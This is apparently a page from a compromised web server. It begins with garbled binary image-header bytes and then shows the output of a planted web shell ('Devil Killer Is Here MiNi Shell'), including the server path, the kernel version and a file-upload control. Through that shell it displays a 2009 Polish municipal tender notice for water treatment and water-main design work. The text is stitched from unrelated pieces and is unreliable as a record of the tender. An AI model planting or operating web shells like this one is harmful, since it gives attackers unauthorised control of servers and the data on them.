JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090320/71760-N-2009.html

<p class="kh_header"><b>Świdnica: Zadanie nr 1 Opracowanie dokumentacji projektowo-kosztorysowej na zadanie pn. Budowa stacji uzdatniania wody na działce nr 183,2 w Komorowie

Zadanie nr 2  Opracowanie dokumentacji projektowo-kosztorysowej na zadanie pn.Budowa stacji uzdatniania wody na działce nr 96,38 w Jagodniku

Zadanie nr 3 Opracowanie dokumentacji projektowo-kosztorysowej na zadanie pn. Budowa wodociągu  tranzytowego  Miłochów-Pszenno</b><br>
<b>Numer ogłoszenia: 71760 - 2009; data zamieszczenia: 20.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świdnica , ul. Głowackiego 4, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8523067 w. 24, faks 074 8521226w.400.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina.swidnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie nr 1 Opracowanie dokumentacji projektowo-kosztorysowej na zadanie pn. Budowa stacji uzdatniania wody na działce nr 183,2 w Komorowie

Zadanie nr 2  Opracowanie dokumentacji projektowo-kosztorysowej na zadanie pn.Budowa stacji uzdatniania wody na działce nr 96,38 w Jagodniku

Zadanie nr 3 Opracowanie dokumentacji projektowo-kosztorysowej na zadanie pn. Budowa wodociągu  tranzytowego  Miłochów-Pszenno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach zamówienia dla każdego z zadań tj. dla zadania nr 1, zadania nr 2 oraz zadania nr 3 Wykonawca wykona następujące opracowania:
1)projekt budowlany (PB), sporządzony zgodnie z przepisami Prawa Budowlanego oraz Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2003 Nr 120 poz. 1133),
2)projekt wykonawczy (PW), sporządzony zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U.04.202.2072 z póź. zm.),
3)Informację dotyczącą Bezpieczeństwa i Ochrony Zdrowia (BIOZ), sporządzoną zgodnie z przepisami Prawa Budowlanego,
4) Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (STWiORB), sporządzone według zapisów Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz.U.04.202.2072 z póź. zm.),
5)przedmiar robót (PR), sporządzony zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. Nr 130, poz. 1389),
6)kosztorys inwestorski, sporządzony według zapisów Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. Nr 130, poz. 1389),
W ramach zamówienia wykonawca  będzie pełnił nadzór autorski..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> WYKONAWCY SKŁADAJĄCY OFERTĘ NA ZADANIE NR 1 MUSZĄ SPEŁNIAĆ NASTĘPUJĄCE WARUNKI UDZIAŁU W  POSTĘPOWANIU: 

1)	Posiadać uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2)	Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. W szczególności Wykonawca musi spełniać następujące warunki:
a)	wykonać w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, usługi odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot niniejszego zamówienia, w tym:
- Wykonawca musi wykazać, iż wykonał co najmniej jedną dokumentację projektową dla budowy stacji uzdatniania wody o wydajności  min 40m3,h i wartości robót budowlanych zgodnych z kosztorysem inwestorskim min. 1 mln PLN ,

b)	wskazać osoby, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności, w tym co najmniej:
* Projektanta w specjalności sanitarnej posiadającego:
   - uprawnienia budowlane do projektowania w specjalności instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) - art. 12 ust. 2 z uwzględnieniem art. 104 ustawy z dnia 7 lipca 1994r. - Prawo budowlane (j.t. Dz.U.06.156.1118 ze zm.),
- 	aktualny, na dzień składania wniosków o dopuszczenie do udziału w postępowaniu, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę, zgodnie z przepisami prawa przywołanymi powyżej,

3)	Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. 
4)	Nie podlegać wykluczeniu z postępowania na podstawie art. 24 Ustawy Pzp.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie złożonych przez wykonawcę(ów) oświadczeń o spełnianiu warunków udziału w postępowaniu i dokumentów potwierdzających spełnianie tych warunków, z zastrzeżeniem art. 26 ust. 3  Ustawy Pzp.


WYKONAWCY SKŁADAJĄCY OFERTĘ NA ZADANIE NR 2 MUSZĄ SPEŁNIAĆ NASTĘPUJĄCE WARUNKI UDZIAŁU W  POSTĘPOWANIU: 

1)	Posiadać uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2)	Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. W szczególności Wykonawca musi spełniać następujące warunki:
a)wykonać w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, usługi odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot niniejszego zamówienia, w tym:
- Wykonawca musi wykazać, iż wykonał co najmniej jedną dokumentację projektową dla budowy stacji uzdatniania wody o wydajności  min 100m3,h i wartości robót budowlanych zgodnych z kosztorysem inwestorskim min. 2 mln PLN ,

b) wskazać osoby, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności, w tym co najmniej:
* Projektanta w specjalności sanitarnej posiadającego:
- 	uprawnienia budowlane do projektowania w specjalności instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) - art. 12 ust. 2 z uwzględnieniem art. 104 ustawy z dnia 7 lipca 1994r. - Prawo budowlane (j.t. Dz.U.06.156.1118 ze zm.),
- aktualny, na dzień składania wniosków o dopuszczenie do udziału w postępowaniu, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę, zgodnie z przepisami prawa przywołanymi powyżej,

3)Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. 
4)Nie podlegać wykluczeniu z postępowania na podstawie art. 24 Ustawy Pzp.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie złożonych przez wykonawcę(ów) oświadczeń o spełnianiu warunków udziału w postępowaniu i dokumentów potwierdzających spełnianie tych warunków, z zastrzeżeniem art. 26 ust. 31Ustawy Pzp.

WYKONAWCY SKŁADAJĄCY OFERTĘ NA ZADANIE NR 3  MUSZĄ SPEŁNIAĆ NASTĘPUJĄCE WARUNKI UDZIAŁU W  POSTĘPOWANIU: 

1)	Posiadać uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2)	Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. W szczególności Wykonawca musi spełniać następujące warunki:
a)	wykonać w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, usługi odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot niniejszego zamówienia, w tym:
- Wykonawca musi wykazać, iż wykonał co najmniej dwie dokumentacje projektowe dla budowy sieci wodociągowej, w tym jedna o długości co najmniej 2 km i o wartości robót budowlanych zgodnie z kosztorysem inwestorskim minimum 1 mln PLN.

3)	wskazać osoby, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakres wykonywanych przez nich czynności, w tym co najmniej:
* Projektanta w specjalności sanitarnej posiadającego:
  - uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) - art. 12 ust. 2 z uwzględnieniem art. 104 ustawy z dnia 7 lipca 1994r. - Prawo budowlane (j.t. Dz.U.06.156.1118 ze zm.),
- 	aktualny, na dzień składania wniosków o dopuszczenie do udziału w postępowaniu, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę, zgodnie z przepisami prawa przywołanymi powyżej,

4)	Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. 
5)	Nie podlegać wykluczeniu z postępowania na podstawie art. 24 Ustawy Pzp.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie złożonych przez wykonawcę(ów) oświadczeń o spełnianiu warunków udziału w postępowaniu i dokumentów potwierdzających spełnianie tych warunków, z zastrzeżeniem art. 26 ust. 3  Ustawy Pzp.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> WYKONAWCY SKŁADAJĄCY OFERTĘ NA ZADANIE NR 1  MUSZĄ DOŁĄCZYĆ DO OFERTY NASTĘPUJĄCE DOKUMENTY I OŚWIADCZENIA: 

1. 	W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, oraz nie podlega wykluczeniu na podstawie art. 24 ustawy pzp, Wykonawcy zobowiązani są przedłożyć: 
1) 	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Uwaga: 	Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokument, o którym mowa, musi złożyć każdy z Wykonawców - oddzielnie.
2) 	Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o nie podleganiu wykluczeniu na podstawie art. 24 ustawy pzp - zgodnie z załącznikiem nr 2 do SIWZ.
3) 	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Uwaga: 	Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokument, o którym mowa, musi złożyć każdy z Wykonawców - oddzielnie.

2. 	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ppkt 1.1), 1.3) niniejszej IDW, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) 	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) 	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organy,
c) 	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
2.1	Dokumenty, o których mowa w ppkt 2.a) i c) niniejszej IDW, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.2	Dokument, o którym mowa w ppkt 2.b) niniejszej IDW, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2.3	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1. i 2., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 
3.	W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, Wykonawcy zobowiązani są przedłożyć:
1)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie, sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej IDW. (Wykonawca musi wykazać, iż wykonał co najmniej jedną dokumentację projektową dla budowy stacji uzdatniania wody o wydajności  min 40m3/h i wartości robót budowlanych zgodnych z kosztorysem inwestorskim min. 1 mln PLN)
2)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i  które będą uczestniczyć w  wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności lub pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, jeżeli dotyczy (art. 22 ust. 1 pkt 2) Ustawy Pzp), w tym co najmniej:   Projektanta w specjalności sanitarnej posiadającego:
- 	uprawnienia budowlane do projektowania w specjalności instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (lub odpowiadające im równoważne upraw?nienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) - art. 12 ust. 2 z uwzględnieniem art. 104 ustawy z dnia 7 lipca 1994r. - Prawo budowlane (j.t. Dz.U.06.156.1118 ze zm.),
- 	aktualny, na dzień składania wniosków o dopuszczenie do udziału w postępowaniu, wpis na listę członków właściwej Izby samorządu zawodowego potwierdzony zaświadczeniem, wydanym przez tę Izbę, zgodnie z przepisami prawa przywołanymi powyżej,sporządzony według wzoru stanowiącego załącznik nr 4 do niniejszej IDW. 
                                                                                                                
4.	Wypełniony formularz  ofertowy  (zgodnie z załącznikiem nr 1 do SIWZ).
5.	Dokumenty, o których mowa w niniejszym punkcie, składane są w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę (osobę upoważnioną do podpisywania oferty).
6.	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.
7.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.





WYKONAWCY SKŁADAJĄCY OFERTĘ NA ZADANIE NR 2 MUSZĄ DOŁĄCZYĆ DO OFERTY NASTĘPUJĄCE DOKUMENTY I OŚWIADCZENIA: 

1. 	W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, oraz nie podlega wykluczeniu na podstawie art. 24 ustawy pzp, Wykonawcy zobowiązani są przedłożyć: 
1) 	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Uwaga: 	Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokument, o którym mowa, musi złożyć każdy z Wykonawców - oddzielnie.
2) 	Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o nie podleganiu wykluczeniu na podstawie art. 24 ustawy pzp - zgodnie z załącznikiem nr 2 do SIWZ.
3) 	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Uwaga: 	Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokument, o którym mowa, musi złożyć każdy z Wykonawców - oddzielnie.

2. 	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ppkt 1.1), 1.3) niniejszej IDW, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) 	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) 	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organy,
c) 	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
2.4	Dokumenty, o których mowa w ppkt 2.a) i c) niniejszej IDW, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.5	Dokument, o którym mowa w ppkt 2.b) niniejszej IDW, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2.6	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1. i 2., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 
3.	W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, Wykonawcy zobowiązani są przedłożyć:
1)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie, sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej IDW. (Wykonawca musi wykazać, iż wykonał co najmniej jedną dokumentację projektową dla budowy stacji uzdatniania wody o wydajności  min 100m3/h i wartości robót budowlanych zgodnych z kosztorysem inwestorskim min. 2 mln PLN).
2)	wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i  które będą uczestniczyć w  wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności lub pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, jeżeli dotyczy (art. 22 ust. 1 pkt 2) Ustawy Pzp), w tym co najmniej:   Projektanta w specjalności sanitarnej posiadającego:
